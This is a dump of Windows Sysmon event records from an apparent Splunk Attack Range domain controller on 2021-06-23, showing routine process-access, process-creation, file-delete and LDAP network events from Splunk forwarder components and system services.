21:05:53.096{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021722Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:53.096{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021721Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:53.096{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021720Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:53.096{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021719Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:53.096{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A230-60D3-9904-00000000CF01}2460C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021718Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:53.096{4DB9351A-9DEA-60D3-3000-00000000CF01}24043520C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4DB9351A-A230-60D3-9904-00000000CF01}2460C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000021717Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:52.973{4DB9351A-A230-60D3-9904-00000000CF01}2460C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4DB9351A-9DDB-60D3-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000021748Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:54.846{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DCE596F9695A384CE3A0B48026C4CBF1,SHA256=0842DB3BF6A3169B60FC85D571DA195B3EA4B49118798D24D13401AAF7C7DA71,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000021747Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:54.784{4DB9351A-9DEC-60D3-3800-00000000CF01}33643396C:\Windows\system32\conhost.exe{4DB9351A-A232-60D3-9B04-00000000CF01}5972C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021746Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:54.784{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021745Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:54.784{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021744Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:54.784{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021743Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:54.784{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021742Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:54.784{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A232-60D3-9B04-00000000CF01}5972C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021741Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:54.784{4DB9351A-9DEA-60D3-3000-00000000CF01}24043520C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4DB9351A-A232-60D3-9B04-00000000CF01}5972C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000021740Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:54.660{4DB9351A-A232-60D3-9B04-00000000CF01}5972C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4DB9351A-9DDB-60D3-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000021739Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:54.784{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=03EDCFEB283E0838A2FFCB6B86177C63,SHA256=E4A750968AEBB5C74C347F11BE1C7FD75CB5E93AEAA31E6BBB4A96CA02E1AF7C,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000021738Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:53.247{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61445-false10.0.1.12-8000- 354300x800000000000000021737Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:52.589{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local61444-true0:0:0:0:0:0:0:1win-dc-663.attackrange.local389ldap 354300x800000000000000021736Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:52.589{4DB9351A-9DEA-60D3-2B00-00000000CF01}3024C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local61444-true0:0:0:0:0:0:0:1win-dc-663.attackrange.local389ldap 10341000x800000000000000021735Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:54.331{4DB9351A-A231-60D3-9A04-00000000CF01}51443780C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021734Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:54.049{4DB9351A-9DEC-60D3-3800-00000000CF01}33643396C:\Windows\system32\conhost.exe{4DB9351A-A231-60D3-9A04-00000000CF01}5144C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021733Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:54.018{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021732Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:54.018{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021731Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:54.018{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021730Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:54.018{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021729Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:54.018{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A231-60D3-9A04-00000000CF01}5144C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021728Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:54.018{4DB9351A-9DEA-60D3-3000-00000000CF01}24043520C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4DB9351A-A231-60D3-9A04-00000000CF01}5144C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000021727Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:53.772{4DB9351A-A231-60D3-9A04-00000000CF01}5144C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4DB9351A-9DDB-60D3-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000021758Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:55.862{4DB9351A-A233-60D3-9C04-00000000CF01}56246828C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000021757Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:55.862{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9ED0CD73AC1400949D07634FA5AE07F1,SHA256=4DE10C640E3578952E80676996702D75343C0B711A4F7D1CC54E13A76650E5DC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000021756Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 